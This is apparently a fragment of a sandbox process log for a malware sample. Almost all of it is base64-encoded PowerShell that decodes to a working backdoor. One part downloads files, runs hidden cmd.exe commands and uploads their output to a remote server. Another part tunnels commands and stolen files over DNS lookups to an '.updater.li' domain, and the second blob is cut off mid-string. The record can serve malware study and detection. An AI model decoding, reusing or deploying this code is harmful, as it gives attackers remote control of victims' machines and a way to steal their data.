ADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7AA0ACgAJAAkADQAKAAkACQB0AHIAeQANAAoACQAJAHsADQAKAAkACQAJACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAaQBuAGsALAAkAGYAaQBsAGUAKQA7AA0ACgAJAAkAfQANAAoACQAJAGMAYQB0AGMAaAANAAoACQAJAHsADQAKAAkACQAJAHQAaAByAG8AdwAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEUAeABjAGUAcAB0AGkAbwBuAF0AIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwANAAoACQAJAH0ADQAKAAkAfQANAAoACQAkAGMAZAAgAD0AIAAkAHcAYwAuAFIAZQBzAHAAbwBuAHMAZQBIAGUAYQBkAGUAcgBzAFsAJwBDAG8AbgB0AGUAbgB0AC0ARABpAHMAcABvAHMAaQB0AGkAbwBuACcAXQA7AA0ACgAJACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAYwBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGMAZAAuAEkAbgBkAGUAeABPAGYAKAAnAGYAaQBsAGUAbgBhAG0AZQA9ACcAKQArADkAKQA7AA0ACgAJACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGYAaQBsAGUAbgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC0AJwAsACcALwAnACkAKQApADsADQAKAAkAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAKAAoACQAcABhAHQAaAAuAFQAcgBpAG0ARQBuAGQAKAAnAFwAJwApACkAKwAnAFwAJwArACQAZgBpAGwAZQBuAGEAbQBlACkAIAAtAFYAYQBsAHUAZQAgACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABmAGkAbABlACkAKQApACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlADsADQAKAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABmAGkAbABlACAALQBGAG8AcgBjAGUAOwANAAoACQByAGUAdAB1AHIAbgAgACgAKAAkAHAAYQB0AGgALgBUAHIAaQBtAEUAbgBkACgAJwBcACcAKQApACsAJwBcACcAKwAkAGYAaQBsAGUAbgBhAG0AZQApADsADQAKAH0ADQAKAA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEQAbwB3AG4AVABoAGUAbQBBAGwAbAANAAoAewANAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAE0AWQBIAE8ATQBFACQARABOAEwASwApACkADQAKAAkAewANAAoACQAJAE4AZQB3AC0ASQB0AGUAbQAgACQATQBZAEgATwBNAEUAJABEAE4ATABLACAALQB0AHkAcABlACAAZgBpAGwAZQA7AA0ACgAJAAkAJABpACAAPQAgADEAOwANAAoACQAJAHcAaABpAGwAZQAoACQAaQAgAC0AbABlACAAMwApAA0ACgAJAAkAewANAAoACQAJAAkAdAByAHkADQAKAAkACQAJAHsADQAKAAkACQAJAAkARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAIAAoACQAUwBFAFIAVgBFAFIAKwAnAGQAJwApACAAKAAkAE0AWQBIAE8ATQBFACsAJABEAE4AKQA7AA0ACgAJAAkACQB9AA0ACgAJAAkACQBjAGEAdABjAGgADQAKAAkACQAJAHsADQAKAAkACQAJAAkAYgByAGUAYQBrADsADQAKAAkACQAJAH0ADQAKAAkACQAJACQAaQArACsAOwANAAoACQAJAH0ADQAKAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQARABOAEwASwAgAC0ARgBvAHIAYwBlADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAVQBwAGwAbwBhAGQARgBpAGwAZQBSAGUAbQBvAHYAZQAoACQAZgBpAGwAZQApAA0ACgB7AA0ACgAJAGkAZgAoACgARwBlAHQALQBJAHQAZQBtACAAKAAkAGYAaQBsAGUAKQApAC4AbABlAG4AZwB0AGgAIAAtAGcAdAAgADAAKQANAAoACQB7AA0ACgAJAAkAJAB3AGMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAJAAkAJAB3AGMALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIAAkAHQAcgB1AGUAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAnACwAJwAqAC8AKgAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAQgBJAFQAUwAvADcALgA3ACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAEEAYwBjAGUAcAB0AC0ATABhAG4AZwB1AGEAZwBlACcALAAnAGUAbgAtAFUAUwAsAGUAbgA7AHEAPQAwAC4ANQAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAtAEUAbgBjAG8AZABpAG4AZwAnACwAJwBnAHoAaQBwACwAIABkAGUAZgBsAGEAdABlACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAFIAZQBmAGUAcgBlAHIAJwAsACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AZwBvAG8AZwBsAGUALgBjAG8AbQAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBQAHIAYQBnAG0AYQAnACwAJwBuAG8ALQBjAGEAYwBoAGUAJwApADsADQAKAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQwBhAGMAaABlAC0AQwBvAG4AdAByAG8AbAAnACwAJwBuAG8ALQBjAGEAYwBoAGUAJwApADsADQAKAAkACQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABmAGkAbABlACkAKQApACAAfAAgAE8AdQB0AC0ARgBpAGwAZQAgACQAZgBpAGwAZQAgAC0ARQBuAGMAbwBkAGkAbgBnACAARABlAGYAYQB1AGwAdAA7AA0ACgAJAAkAJABpAD0AMQA7AA0ACgAJAAkAdwBoAGkAbABlACgAJABpACAALQBsAGUAIAAzACkADQAKAAkACQB7AA0ACgAJAAkACQB0AHIAeQANAAoACQAJAAkAewANAAoACQAJAAkACQAkAHcAYwAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAkAFMARQBSAFYARQBSACsAJwB1ACcALAAkAGYAaQBsAGUAKQA7AA0ACgAJAAkACQAJAGIAcgBlAGEAawA7AA0ACgAJAAkACQB9AA0ACgAJAAkACQBjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgAJAAkACQB7AA0ACgAJAAkACQAJACQAaQArACsAOwANAAoACQAJAAkACQBjAG8AbgB0AGkAbgB1AGUAOwANAAoACQAJAAkAfQANAAoACQAJAH0ADQAKAAkACQANAAoACQAJAGkAZgAgACgAJABpACAALQBlAHEAIAA0ACkADQAKAAkACQB7AA0ACgAJAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAUgBlAGYAZQByAGUAcgAnACwAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBnAG8AbwBnAGwAZQAuAGMAbwBtACcAKQA7AA0ACgAJAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQQBjAGMAZQBwAHQAJwAsACcAKgAvACoAJwApADsADQAKAAkACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwBbACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnAF0AIAA9ACAAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMwA7ACAAVwBpAG4ANgA0ADsAIAB4ADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwANAAoACQAJAAkAJABpACAAPQAgADEAOwANAAoACQAJAAkAdwBoAGkAbABlACgAJABpACAALQBsAGUAIAAzACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAdAByAHkADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAdwBjAC4AVQBwAGwAbwBhAGQARgBpAGwAZQAoACQAUwBFAFIAVgBFAFIAKwAnAHUAJwAsACQAZgBpAGwAZQApADsADQAKAAkACQAJAAkACQBiAHIAZQBhAGsAOwANAAoACQAJAAkACQB9AA0ACgAJAAkACQAJAGMAYQB0AGMAaAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEUAeABjAGUAcAB0AGkAbwBuAF0ADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAaQArACsAOwANAAoACQAJAAkACQAJAGMAbwBuAHQAaQBuAHUAZQA7AA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAdwBhAGkAdABmAG8AcgAgAHUAcABsAHAAcgBvAGMAIAAvAFQAIAAxADsADQAKAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABmAGkAbABlADsADQAKAH0ADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAVQBwAFQAaABlAG0AQQBsAGwADQAKAHsADQAKAAkAaQBmACgALQBuAG8AdAAoAFQAZQBzAHQALQBQAGEAdABoACAAJABNAFkASABPAE0ARQAkAFUAUABMAEsAKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVQBQAEwASwAgAC0AdAB5AHAAZQAgAGYAaQBsAGUAOwANAAoACQAJAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVQBQACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAB7AHQAcgB5AHsAVQBwAGwAbwBhAGQARgBpAGwAZQBSAGUAbQBvAHYAZQAgACgAJABfAC4ARgB1AGwAbABOAGEAbQBlACkAfQBjAGEAdABjAGgAewBjAG8AbgB0AGkAbgB1AGUAfQB9ADsADQAKAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVQBQAEwASwAgAC0ARgBvAHIAYwBlADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABEAG8AdwBuAGwAbwBhAGQARQB4AGUAYwB1AHQAZQANAAoAewANAAoACQB0AHIAeQANAAoACQB7AA0ACgAJAAkAJABiAGEAdABmAGkAbABlACAAPQAgAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACAAKAAkAFMARQBSAFYARQBSACsAJwBiACcAKQAgACgAJABNAFkASABPAE0ARQArACQARABOACkAOwANAAoACQB9AA0ACgAJAGMAYQB0AGMAaAANAAoACQB7AA0ACgAJAAkAcgBlAHQAdQByAG4AOwANAAoACQB9AA0ACgAJACQAYQByAGcAcwA9ACIALwBjACAAIgArACQAYgBhAHQAZgBpAGwAZQArACIAIAA+ACAAIgArACQAYgBhAHQAZgBpAGwAZQArACIALgB0AHgAdAAiADsADQAKAAkAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAFcAYQBpAHQAIAAtAEYAaQBsAGUAUABhAHQAaAAgAGMAbQBkACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAYQByAGcAcwA7AA0ACgAJAFUAcABsAG8AYQBkAEYAaQBsAGUAUgBlAG0AbwB2AGUAKAAkAGIAYQB0AGYAaQBsAGUAKwAnAC4AdAB4AHQAJwApADsADQAKAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGIAYQB0AGYAaQBsAGUAKQA7AA0ACgB9AA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEkAbgBpAHQAQwBoAGUAYwBrAA0ACgB7AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABEAE4AKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQARABOACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABVAFAAKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVQBQACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABUAFAAKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVABQACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgB9AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABBAGwAaQB2AGUADQAKAHsADQAKAAkASQBuAGkAdABDAGgAZQBjAGsAOwANAAoACQBEAG8AdwBuAFQAaABlAG0AQQBsAGwAOwANAAoACQBEAG8AdwBuAGwAbwBhAGQARQB4AGUAYwB1AHQAZQA7AA0ACgAJAFUAcABUAGgAZQBtAEEAbABsADsADQAKAH0ADQAKAA0ACgANAAoAQQBsAGkAdgBlADsA'} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2884 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand JABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AcwB0ACAAPQAgACcALgB1AHAAZABhAHQAZQByAC4AbABpACcAOwANAAoAJABnAGwAbwBiAGEAbAA6AGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAnACcAOwANAAoAJABnAGwAbwBiAGEAbAA6AG0AeQBmAGwAYQBnACAAPQAgADAAOwANAAoAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAIAA9ACAAJwAjACMAIwAnADsADQAKACQAZwBsAG8AYgBhAGwAOgBtAHkAaABvAG0AZQAgAD0AIAAiACQAZQBuAHYAOgBQAHUAYgBsAGkAYwBcAEwAaQBiAHIAYQByAGkAZQBzAFwAUgBlAGMAbwByAGQAZQBkAFQAVgBcACIAOwANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABjAG8AbgB2AGUAcgB0AFQAbwAtAEIAYQBzAGUAMwA2ACAAKAAkAGQAZQBjAE4AdQBtAD0AIgAiACkADQAKAHsADQAKACAAIAAgACAAJABkAGUAYwBOAHUAbQAgACUAPQAgADQANgA2ADUANgA7AA0ACgAgACAAIAAgACQAYQBsAHAAaABhAGIAZQB0ACAAPQAgACIAMAAxADIAMwA0ADUANgA3ADgAOQBBAEIAQwBEAEUARgBHAEgASQBKAEsATABNAE4ATwBQAFEAUgBTAFQAVQBWAFcAWABZAFoAIgA7AA0ACgAgACAAIAAgAGQAbwANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAbQBhAGkAbgBkAGUAcgAgAD0AIAAoACQAZABlAGMATgB1AG0AIAAlACAAMwA2ACkAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYwBoAGEAcgAgAD0AIAAkAGEAbABwAGgAYQBiAGUAdAAuAHMAdQBiAHMAdAByAGkAbgBnACgAJAByAGUAbQBhAGkAbgBkAGUAcgAsADEAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAGEAcwBlADMANgBOAHUAbQAgAD0AIAAiACQAYwBoAGEAcgAkAGIAYQBzAGUAMwA2AE4AdQBtACIAOwANAAoAIAAgACAAIAAgACAAIAAgACQAZABlAGMATgB1AG0AIAA9ACAAKAAkAGQAZQBjAE4AdQBtACAALQAgACQAcgBlAG0AYQBpAG4AZABlAHIAKQAgAC8AIAAzADYAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAHcAaABpAGwAZQAgACgAJABkAGUAYwBOAHUAbQAgAC0AZwB0ACAAMAApADsADQAKACAAIAAgACAAJABiAGEAcwBlADMANgBOAHUAbQAuAFAAYQBkAEwAZQBmAHQAKAAzACwAJwAwACcAKQA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdABTAHUAYgAoACQAbQB5AGYAbABhAGcAMgAsACAAJABjAG0AZABpAGQAPQAnADAAMAAnACwAIAAkAHAAYQByAHQAaQBkAD0AJwAwADAAMAAnACkADQAKAHsADQAKACAAIAAgACAAaQBmACgAJABtAHkAZgBsAGEAZwAyACAALQBlAHEAIAAwACkADQAKACAAIAAgACAAewANAAoACQAJACgAJwB6AHoAMAAwADAAMAAwADAAJwArACgAYwBvAG4AdgBlAHIAdABUAG8ALQBCAGEAcwBlADMANgAoAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAE0AYQB4AGkAbQB1AG0AIAA0ADYANgA1ADUAKQApACkAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGUAbABzAGUAaQBmACgAJABtAHkAZgBsAGEAZwAyACAALQBlAHEAIAAxACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACgAJwB6AHoAJwArACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACsAJwAwADAAMAAwADAAJwArACgAYwBvAG4AdgBlAHIAdABUAG8ALQBCAGEAcwBlADMANgAoAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAE0AYQB4AGkAbQB1AG0AIAA0ADYANgA1ADUAKQApACkAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGUAbABzAGUAaQBmACgAJABtAHkAZgBsAGEAZwAyACAALQBlAHEAIAAyACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACgAJwB6AHoAJwArACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACsAJABjAG0AZABpAGQAKwAkAHAAYQByAHQAaQBkACsAKABjAG8AbgB2AGUAcgB0AFQAbwAtAEIAYQBzAGUAMwA2ACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ATQBhAHgAaQBtAHUAbQAgADQANgA2ADUANQApACkAKQA7AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAGYAdQBuAGMAdABpAG8AbgAgAFMAdAByADIASABlAHgAKAAkAG0AeQBzAHQAcgApAA0ACgB7AA0ACgAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBCAGkAdABDAG8AbgB2AGUAcgB0AGUAcgBdADoAOgBUAG8AUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBEAGUAZgBhAHUAbAB0AC4ARwBlAHQAQgB5AHQAZQBzACgAJABtAHkAcwB0AHIAKQApAC4AUgBlAHAAbABhAGMAZQAoACIALQAiACwAIAAiACIAKQA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABBAGwAaQB2AGUADQAKAHsADQAKAAkAaQBmACgAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAIAAtAGUAcQAgACcAIwAnACsAJwAjACMAJwApAA0ACgAJAHsADQAKAAkACQByAGUAdAB1AHIAbgAgADAAOwANAAoACQB9AA0ACgAgACAAIAAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACgAKABHAGUAdABTAHUAYgAgADEAKQArACcAMwAwACcAKQA7AA0ACgAgACAAIAAgACQAcwB1AGIAIAA9ACAAKAAoAEcAZQB0AFMAdQBiACAAMQApACsAJwAyADMAMgBBACcAKQAgACsAIAAoAFMAdAByADIASABlAHgAIAAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACkAOwANAAoAIAAgACAAIAAkAGkAIAA9ACAAMQA7AA0ACgAgACAAIAAgACQAcgBlAHQAIAA9ACAAMAA7AA0ACgAgACAAIAAgAHcAaABpAGwAZQAoACQAZwBsAG8AYgBhAGwAOgBtAHkAZgBsAGEAZwAgAC0AZQBxACAAMQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHIAZQB0ACAAPQAgADEAOwANAAoAIAAgACAAIAAgACAAIAAgACQAcwB1AGIAMgAgAD0AIAAkAHMAdQBiACAAKwAgACgAUwB0AHIAMgBIAGUAeAAgACQAaQApADsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkAFIAZQBjAGUAaQB2AGUARABOAFMAIAAkAHMAdQBiADIAOwANAAoAIAAgACAAIAAgACAAIAAgACQAaQArACsAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHQAIAAtAGUAcQAgADEAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAARgBpAHgAQgBhAHQARgBpAGwAZQAgACgAJABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AbQBlACsAJwB0AHAAXAAnACsAJABnAGwAbwBiAGEAbAA6AGYAaQBsAGUAbgBhAG0AZQArACIALgBiAGEAdAAiACkAOwANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgACQAcgBlAHQAOwANAAoAfQANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACgAJABkACkADQAKAHsADQAKAAkAJABjAG4AdAAgAD0AIAAwADsADQAKAAkAdwBoAGkAbABlACAAKAAkAGMAbgB0ACAALQBsAHQAIAAyADAAKQANAAoACQB7AA0ACgAJAAkAdAByAHkADQAKAAkACQB7AA0ACgAJAAkACQAkAG0AeQBkAGEAdABhACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ARABOAFMAXQA6ADoARwBlAHQASABvAHMAdABCAHkATgBhAG0AZQAoACQAZAArACQAZwBsAG8AYgBhAGwAOgBtAHkAaABvAHMAdAApAC4AQQBkAGQAcgBlAHMAcwBMAGkAcwB0AFsAMABdACkAOwANAAoACQAJAAkAJABtAHkAZABhAHQAYQAgAD0AIAAoACQAbQB5AGQAYQB0AGEAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBJAFAAQQBkAGQAcgBlAHMAcwBUAG8AUwB0AHIAaQBuAGcAfQApADsADQAKAAkACQAJACQAYwBuAHQAIAA9ACAAMgA1ADsADQAKAAkACQB9AA0ACgAJAAkAYwBhAHQAYwBoAA0ACgAJAAkAewANAAoACQAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBtACAANQAwADAAOwANAAoACQAJAAkAJABjAG4AdAArACsAOwANAAoACQAJAH0ADQAKAAkAfQANAAoAIAAgACAAIABpAGYAKAAtAG4AbwB0ACgAJABjAG4AdAAgAC0AZQBxACAAMgA1ACkAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAKAAnACMAJwArACcAIwAjACcAKQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAKAAkAGcAbABvAGIAYQBsADoAbQB5AGYAbABhAGcAIAAtAGUAcQAgADAAIAAtAGEAbgBkACAAJABtAHkAZABhAHQAYQAuAFMAdABhAHIAdABzAFcAaQB0AGgAKAAnADMAMwAuADMAMwAuACcAKQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHQAbQBwACAAPQAgACQAbQB5AGQAYQB0AGEALgBTAHUAYgBTAHQAcgBpAG4AZwAoADYAKQAuAFMAcABsAGkAdAAoACcALgAnACkAOwANAAoAIAAgACAAIAAgACAAIAAgACQAZwBsAG8AYgBhAGwAOgBmAGkAbABlAG4AYQBtAGUAIAA9ACAAKABbAGMAaABhAHIAXQAgAFsAaQBuAHQAXQAgACQAdABtAHAAWwAwAF0AKQAgACsAIAAoAFsAYwBoAGEAcgBdACAAWwBpAG4AdABdACAAJAB0AG0AcABbADEAXQApADsADQAKACAAIAAgACAAIAAgACAAIAAkAGcAbABvAGIAYQBsADoAbQB5AGYAbABhAGcAIAA9ACAAMQA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAIAAoACQAbQB5AGQAYQB0AGEALgBFAHEAdQBhAGwAcwAoACcAMwA1AC4AMwA1AC4AMwA1AC4AMwA1ACcAKQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGcAbABvAGIAYQBsADoAbQB5AGYAbABhAGcAIAA9ACAAMAA7AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQBpAGYAIAAoACQAZwBsAG8AYgBhAGwAOgBtAHkAZgBsAGEAZwAgAC0AZQBxACAAMQApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAHQAbQBwACAAPQAgACQAbQB5AGQAYQB0AGEALgBTAHAAbABpAHQAKAAnAC4AJwApADsADQAKACAAIAAgACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBBAHAAcABlAG4AZABBAGwAbABUAGUAeAB0ACgAJABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AbQBlACsAJwB0AHAAXAAnACsAJABnAGwAbwBiAGEAbAA6AGYAaQBsAGUAbgBhAG0AZQArACIALgBiAGEAdAAiACwAIAAoACgAWwBjAGgAYQByAF0AIABbAGkAbgB0AF0AIAAkAHQAbQBwAFsAMABdACkAIAArACAAKABbAGMAaABhAHIAXQAgAFsAaQBuAHQAXQAgACQAdABtAHAAWwAxAF0AKQAgACsAIAAoAFsAYwBoAGEAcgBdACAAWwBpAG4AdABdACAAJAB0AG0AcABbADIAXQApACAAKwAgACgAWwBjAGgAYQByAF0AIABbAGkAbgB0AF0AIAAkAHQAbQBwAFsAMwBdACkAKQApADsADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABlAGwAcwBlAGkAZgAoACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACAALQBlAHEAIAAnACMAJwArACcAIwAjACcAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAKABbAGMAaABhAHIAXQAgAFsAaQBuAHQAXQAgACQAbQB5AGQAYQB0AGEALgBTAHAAbABpAHQAKAAnAC4AJwApAFsAMABdACkAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABGAGkAeABCAGEAdABGAGkAbABlACAAKAAkAGIAYQB0AHAAYQB0AGgAKQANAAoAewANAAoAIAAgACAAIAAoAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAYgBhAHQAcABhAHQAaAApAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAxADAAKQAgAHwAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGIAYQB0AHAAYQB0AGgAOwANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZABGAGkAbABlACgAJABtAHkARgBpAGwAZQBQAGEAdABoACkADQAKAHsADQAKACAAIAAgACAAJABtAHkARgBpAGwAZQBOAGEAbQBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AEYAaQBsAGUATgBhAG0AZQBXAGkAdABoAG8AdQB0AEUAeAB0AGUAbgBzAGkAbwBuACgAJABtAHkARgBpAGwAZQBQAGEAdABoACkAOwANAAoAIAAgACAAIAAkAG0AeQBzAHQAcgAgAD0AIABbAFMAeQBzAHQAZ